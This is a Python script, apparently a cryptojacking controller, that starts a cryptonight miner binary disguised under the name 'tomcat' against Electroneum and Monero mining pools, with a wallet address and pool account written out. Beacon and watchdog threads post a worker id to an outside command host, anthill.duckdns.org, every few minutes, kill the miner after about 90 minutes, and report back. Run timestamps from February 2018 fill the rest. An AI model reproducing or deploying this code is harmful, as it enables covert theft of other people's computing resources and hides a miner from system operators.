import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:40:08.879391
#2018-02-17 17:29:07.462388
#2018-02-17 19:18:01.976162
#2018-02-17 21:07:06.922353
#2018-02-17 22:51:05.570551
#2018-02-18 00:36:04.329571
#2018-02-18 02:26:06.530108
#2018-02-18 04:13:05.130268
#2018-02-18 06:05:01.721023
#2018-02-18 07:54:02.226981
#2018-02-18 09:43:07.353286
#2018-02-18 11:29:05.736544
#2018-02-18 13:16:01.316143
#2018-02-18 15:04:04.105064
#2018-02-18 16:51:06.908786
#2018-02-18 18:39:02.140536
#2018-02-18 20:26:07.404656
#2018-02-18 22:11:06.864076
#2018-02-18 23:59:04.041135
#2018-02-19 01:45:04.409631
#2018-02-19 03:34:07.135716
#2018-02-19 05:19:05.424726
#2018-02-19 07:06:03.599314
#2018-02-19 08:55:07.986637
#2018-02-19 10:44:06.056955
#2018-02-19 12:31:06.644680
#2018-02-19 14:18:06.209687
#2018-02-19 16:07:09.334384
#2018-02-19 17:54:06.550865
#2018-02-19 19:42:04.304795
#2018-02-19 21:30:03.030642
#2018-02-19 23:16:02.009011
#2018-02-20 00:59:07.415184
#2018-02-20 02:49:04.169604
#2018-02-20 04:38:01.460887
#2018-02-20 06:23:01.904202
#2018-02-20 08:08:05.572948
#2018-02-20 09:54:07.576983
#2018-02-20 11:38:08.662304
#2018-02-20 13:25:01.381558
#2018-02-20 15:11:06.152451
#2018-02-20 16:55:12.508982
#2018-02-20 18:45:07.935087
#2018-02-20 20:36:08.521394
#2018-02-20 22:22:04.271704
#2018-02-21 00:04:01.995158
#2018-02-21 01:49:05.711562
#2018-02-21 03:38:08.409718
#2018-02-21 05:27:05.370067
#2018-02-21 07:16:05.345531
#2018-02-21 09:00:11.828530
#2018-02-21 10:48:10.308163
#2018-02-21 12:35:04.421604
#2018-02-21 14:21:04.430168
#2018-02-21 16:10:04.830384
#2018-02-21 18:02:07.616107
#2018-02-21 19:48:04.244129
#2018-02-21 21:34:07.696764
#2018-02-21 23:21:07.948151
#2018-02-22 01:10:07.075866
#2018-02-22 02:58:05.390314
#2018-02-22 04:44:08.431245
#2018-02-22 06:29:04.539668
#2018-02-22 08:17:04.982367
#2018-02-22 10:05:08.661874
#2018-02-22 11:51:06.029409
#2018-02-22 13:37:06.790636
#2018-02-22 15:27:01.252683
#2018-02-22 17:14:07.492296
#2018-02-22 19:01:01.652109
#2018-02-22 20:52:06.791708
#2018-02-22 22:37:06.289206
#2018-02-23 00:26:01.882661
#2018-02-23 02:13:01.879595
#2018-02-23 04:03:05.264032
#2018-02-23 05:47:05.810758
#2018-02-23 07:29:05.302549
#2018-02-23 09:34:05.913514
#2018-02-23 11:39:06.979031
#2018-02-23 13:28:07.582220
#2018-02-23 15:14:07.638853
#2018-02-23 17:02:13.233902
#2018-02-23 18:51:08.295904
#2018-02-23 20:37:03.723566
#2018-02-23 22:23:07.962819
#2018-02-24 00:09:02.167872
#2018-02-24 02:01:03.978690
#2018-02-24 03:51:05.904958
#2018-02-24 05:36:07.370859
#2018-02-24 07:22:07.504824
#2018-02-24 09:13:07.113685
#2018-02-24 11:11:01.565744
#2018-02-24 13:00:09.041343
#2018-02-24 14:48:04.354105
#2018-02-24 16:40:04.227202
#2018-02-24 18:28:04.360112
#2018-02-24 20:14:01.537861
#2018-02-24 22:03:05.023786
#2018-02-25 01:01:04.476142
#2018-02-25 04:45:01.531664
#2018-02-25 08:54:01.831853